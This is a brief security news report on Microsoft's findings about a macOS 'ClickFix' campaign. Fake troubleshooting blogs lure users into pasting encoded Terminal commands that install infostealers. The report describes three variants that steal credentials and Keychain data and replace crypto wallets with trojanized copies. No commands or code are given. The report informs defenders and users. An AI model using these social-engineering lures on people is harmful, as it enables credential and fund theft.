ClickFix campaign uses fake macOS utilities lures to deliver infostealers

Microsoft researchers have documented a new "ClickFix" strategy targeting macOS users, moving away from traditional malicious downloads. Attackers host fake troubleshooting blogs on platforms like Medium and Squarespace, tricking visitors into copying and pasting a Base64-encoded command directly into their Mac's Terminal. Because the user manually executes the command, the attack entirely bypasses Apple's standard Gatekeeper security checks, allowing the malware to silently install itself.

Microsoft identified three distinct variations of this attack. The "Loader" (or SHub) campaign uses a script to fingerprint the infected machine and hides its presence by masquerading as a routine Google software update. The "Script" campaign is highly stealthy, operating entirely within the computer's memory without leaving traceable files on the hard drive. Finally, the "Helper" (or AMOS) variant creates a fake system prompt to trick users into typing their Mac password, granting the malware deep, persistent control over the system every time it boots up.

Once active, all three malware variants aggressively hunt for sensitive data, quietly stealing passwords, browser history, Keychain databases, and personal documents. Furthermore, the Loader and Helper campaigns specifically target cryptocurrency holders by deleting legitimate wallet applications like Ledger, Trezor, and Exodus. They replace these with trojanized versions designed to silently drain users' funds during their next transaction.